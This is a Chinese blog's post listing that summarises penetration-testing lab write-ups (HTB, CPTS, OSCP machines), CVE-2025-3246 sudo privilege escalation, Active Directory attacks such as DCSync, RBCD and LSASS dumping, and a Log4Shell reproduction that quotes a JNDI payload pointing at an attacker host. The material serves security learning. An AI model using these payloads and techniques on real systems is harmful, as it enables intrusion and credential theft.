- 博客(76)
- 资源 (1)
- 收藏
- 关注
RSS订阅原创 HTB Attacking GraphQL Skills Assessment
通过枚举应用,利用GraphQL API,发现sql注入点,然后利用找到flag。
2025-10-05 16:52:59
345
原创 CVE-2025–3246 本地提权
在受影响的 Sudo 版本中,–chroot 选项允许用户指定一个根目录,在该目录下执行命令。然而,Sudo 在解析路径时,会在 chroot() 环境中进行,而在评估权限之前就已进入该环境。这意味着我们可以在用户指定的目录中创建恶意的/etc/nsswitch.conf文件,并在其中指定一个恶意的共享库路径。该漏洞允许未经授权的本地用户通过滥用 Sudo 的 --chroot(-R)选项,加载恶意共享库,从而获得 root 权限。
2025-09-22 22:08:16
264
原创 Windows架构
运行Windows操作系统的计算机中的处理器可以在两种不同模式下工作:用户模式和内核模式。应用程序运行在用户模式下,而操作系统组件运行在内核模式下。用户进程:由用户执行的程序/应用程序,如记事本、Chrome或Microsoft Word。子系统DLL:包含用户进程调用的API函数的DLL。例如,kernel32.dll导出CreateFile Windows API(WinAPI)函数,其他常见的子系统DLL包括ntdll.dll、advapi32.dll和user32.dll。Ntdll.dll:
2025-09-05 11:30:30
325
原创 CPTS-Manager ADCS ESC7利用
端口扫描枚举smb共享尝试rid爆破经过文本处理 可以得到用户名列表验证有效用户名首字母小写得到凭证bloodhound信息收集smb共享枚举进入mssql枚举网页路径c:\inetpub\wwwroot发现一个zip,下载解压找到一个密码该用户可以通过winrm拿到shell成功拿到shell。
2025-09-04 19:23:21
601
原创 CPTS-Blackfield
解压得到lsass.dmp ,这是 Windows 的 lsass.exe 进程(Local Security Authority Subsystem Service)的内存转储文件(dump),一份 LSASS 进程运行时的快照,里面包含所有登录会话的认证信息。成功复制ntds.dit和system,ntds.dit —域控数据库,SYSTEM —— 注册表 SYSTEM hive。在这个文件中,我们指示DiskShadow创建C:盘的副本并将其映射到Z:盘。用户名枚举,并且可以进行asp攻击。
2025-09-02 16:50:30
766
原创 CPTS-Vintage 票据,基于资源的约束委派 (RBCD),DPAPI密钥
端口扫描尝试ker票据验证NTLM禁止使用bloodhound信息枚举攻击路径,读取GMSAgMSA (Group Managed Service Account) = 组托管服务账户。它是一种特殊的 AD 账户,用来让服务器、服务或者计划任务运行时自动获取和管理密码。gMSA 账户像普通用户/计算机一样,可以用它的 key 和 KDC 通信,请求 TGT 和服务票据。
2025-09-01 22:48:55
398
原创 Pre-created Computer Accounts利用
预先创建(Pre-created):管理员在计算机加入域之前,就提前在 AD 中手动新建了一个计算机帐户。这样当真正的计算机来加入域时,就会自动使用这个已经存在的帐户,而不需要再即时创建。在 Active Directory (AD) 环境里,每一台加入域的计算机,都会在域控制器里有一个对应的计算机帐户(类似于用户帐户,只不过对象类型是“计算机”)。如果在创建时勾选了 “Pre-Windows 2000 兼容” 选项,密码不会随机生成,而是会设为 计算机名的小写形式。请求一张票据,方便后面利用。
2025-09-01 13:19:19
170
原创 CPTS---Hospital
发现一个登陆位置,可以注册用户,准备注册进入看看有什么功能点发现一个图片上传点,有黑名单限制,可以尝试枚举绕过使用ffuf发现上传目录弄个phpinfo上传shell.phar成功绕过发现很多函数无法使用,需要绕过可以使用weevely.py,可以生成混淆过的webshell连接成功准备升级shell换成msf meterpreter枚举内核版本5.19,发现可能存在nftables oob read/write exploit (CVE-2023-35001)
2025-08-31 17:57:02
282
原创 log4jshell CVE-2021-44228 复现
Log4j 是 Apache 提供的一个非常流行的 Java 日志框架。漏洞编号 CVE‑2021‑44228,就被称作 “Log4Shell”,该漏洞存在于 Log4j 2 版本(从 2.0‑beta9 到 2.14.1)中,因为其日志处理机制中对 JNDI(Java 命名与目录接口)查找没有做限制或验证。攻击者只要向日志字段输入恶意 JNDI 字符串(例如 ${jndi:ldap://攻击者IP/对象}),Log4j 就会去远端服务器加载 Java 对象,从而导致 远程代码执行(RCE)
2025-08-29 22:50:54
378
原创 Intro to Assembly Language---Skills Assessment
我们正在与一家公司签订合同,他们发现了一个可疑的二进制文件。我们用 gdb 检查了该文件,发现它正在向堆栈加载已编码的 shellcode,并将 xor 解码密钥存储在 rbx 中。我们需要在 shellcode 加载到堆栈后对其进行解码,然后运行 shellcode 以获取标志。通过lea rdx, [rsp]将栈顶的值放进rdx,方便后续用密钥进行进行解密,然后进入GDB调试。然后查看栈中的值,也就是解密后的hex编码。查看从栈顶开始14个我们解密后的值,如下。下面是加载shellcode的脚本。
2025-08-28 16:18:43
199
原创 CPTS-Reddish
这个机器可以练习多子网的隧道搭建,推荐使用ligolo-ng来源:0xdf(https://0xdfimages.gitlab.io/img/reddish-network_map-3.webp)
2025-08-27 22:34:37
366
原创 CPTS---Access
端口扫描ftp枚举下载,得到两个文件,Access Control.zip和backup.mdb,zip压缩包有密码,尝试john工具得到密码后解压查看得到一个凭证登陆。
2025-08-26 19:00:42
219
原创 CPTS-Pressed复现(XML-RPC)
PHP Everywhere是一个 WordPress 插件,允许在 WordPress 文章中运行 PHP。得到凭证,尝试登陆(这里是将原密码的2021修改为2022尝试登陆,该主机发布时间为2022年)发现有2FA,但是能够滥用 xmlrpc.php 绕过双重身份验证 (2FA) 并使用凭证登录。该box较难,主要是了解wordpress-XML-RPC 的使用。似乎正在运行此代码,通过从此日志文件中读取它来生成网站上的表格。尝试加入一个system函数,写入一个webshell。
2025-08-25 21:29:09
442
原创 CPTS-Outdated
端口扫描,匿名smb共享枚举发现一个pdf,下载到本地查看发现可能存在该漏洞使用该exp,(https://github.com/JohnHammond/msdt-follina)修改payload发送成功拿到shell。
2025-08-23 17:08:30
167
原创 CPTS--Soccer
端口扫描:添加进hosts访问目录枚举发现tiny,访问google一下默认的凭证尝试一下admin : admin@123,发现成功登陆后台尝试上传一个php 反向shell利用得到初始shell。
2025-08-22 12:20:08
269
原创 CPTS---Shoppy 复现
端口扫描根据nmap的枚举信息,将 shoppy.htb添加hosts文件,然后用ffuf枚举一下web路径尝试登陆admin:admin 报错尝试枚举一下错误信息根据报错信息,google一下,后端可能是用node.js,一般来说是搭配NoSQL 数据库比如MongoDB,尝试一下nosql注入绕过成功302导向admin目录进入后台发现一个接口查询返回所有文档,因为满足了一个恒真条件 (‘a’==‘a’)得到josh密码,但是该密码不是ssh凭证进行枚举。
2025-08-20 10:46:41
245
原创 汇编语言学习2---GNU Debugger (GDB)
学习记录,在汇编语言 ,我们面对的是机器码(以汇编指令形式展现),所以断点要设置在机器码被加载到内存中的位置。
2025-08-19 16:05:29
446
原创 汇编语言学习1---编译和反编译
学习记录,示例代码和分析这里进行编译,-f elf64 要编译一个 64 位汇编代码。如果是 32 位则使用 -f elf会生成一个helloWorld.o的目标文件,汇编器 (assembler) 会把汇编代码 转换成机器码,并且把所有变量、代码段、数据段的细节都打包进去。下一步,使用链接器 (linker) 把它和系统的启动代码、库等链接在一起,生成最终的可执行文件(Linux 下的 ELF 格式)。成功运行。
2025-08-19 15:19:53
458
原创 CPTS---Active 复现
与DC核对调整一下时间匿名枚举smb共享发现Replication可读,列出全部目录,方便查看共享文件发现Groups.xml,尝试下载到本地查看发现一个cpassword的属性很有兴趣,尝试google,可以使用这个工具得到密码尝试kerberoasting攻击得到管理员hash得到密码。
2025-08-18 23:15:30
263
原创 CPTS Driver 复现
查看80端口发现可以上传打印机固件到文件共享。测试团队将手动审核上传内容。尝试上传一个ink文件,获取NTLMv2哈希值生成成功拿到hash得到密码测试发现可以利用winrm协议进入。
2025-08-16 11:50:16
212
原创 CPTS-MetaTwo复现
发现用户和密码,发现存在passpie。查看密码,发现了root密码。发现该插件用sql注入漏洞。发现是wordpress。
2025-08-15 12:41:27
224
原创 CPTS Sekhmet复现
举个例子,假设有一个包含用户信息的对象(比如用户名、密码等),可能需要把它存储到数据库或者通过网络传输给别的程序,这时就需要序列化它,把对象转成一种可保存和传输的格式,反序列化是把序列化的数据转回原本的对象。这里form.ps1 是一个 PowerShell 脚本,它通过 Windows 表单(GUI)创建了一个界面,允许用户更新他们的 mobile 属性,debug-users.txt 文件通常用于调试,可能包含了用户的部分信息、设置或操作记录。很可能这个文件是由系统或管理员用来检查用户数据的。
2025-08-10 21:50:35
988
原创 CPTS练习 Forest
在使用 Microsoft Exchange 的环境中,Exchange Windows 权限组允许权限提升至 域管理员。本质上,该组的成员有权授予自己 DCSync 权限,而此攻击路径已被 Microsoft 确定为“无法修复”的问题。修改除受保护组(管理员、服务器操作员、账户操作员、备份操作员或打印操作员组)之外的本地和全局组。DNSAdmins组和Exchange Windows Permissions组。通过传递哈希,成功进入,也可以使用psexec工具。没有开放太多端口 尝试利用LDAP协议。
2025-08-06 11:15:02
271
原创 HTB CPTS Pivoting Tunneling and Port Forwarding Skills Assessment 复现
然后上传linPEAS枚举,发现用户:有一个webadmin用户。发现webadmin私钥第一个问题是进入 Web 服务器后,枚举主机以获取可用于启动到网络中另一台主机的透视或隧道的凭证。您可以在哪个用户的目录中找到凭据?提交用户的名称作为答案?
2025-07-07 15:09:18
887
原创 PG靶机复现 workaholic--Shared Libraries提权
发现3个端口通过wpscan扫描发现三个用户并且发现插件google一下发现存在sql注入,使用poc程序拿到三个用户的hash,然后使用hashcat拿到其中两个用户的charlie可以成功登陆,但是不是admin没有什么权限可以利用,回到FTP这里需要使用主动模式发现是wp目录文件下载配置文件发现密码。
2025-06-25 15:22:19
320
原创 OSCP靶机练习 PG ZenPhoto
端口扫描目录扫描发现robots文件从web注释发现版本为1.4.1.4,google存在rce,下载利用成功,然后配合penelope拿到一个稳定的shell成功。
2025-06-23 22:07:23
282
原创 PG靶机复现 Hetemit
导入os.system(),放回了数值,尝试是否可以执行反向shell。访问verify,返回code,切换成post请求。查看并且修改,反向shell,用户改成root。PEAS枚举发现可以写入。发现我们可以重启和关机。
2025-06-23 14:51:45
229
空空如也
TA创建的收藏夹 TA关注的收藏夹
TA关注的人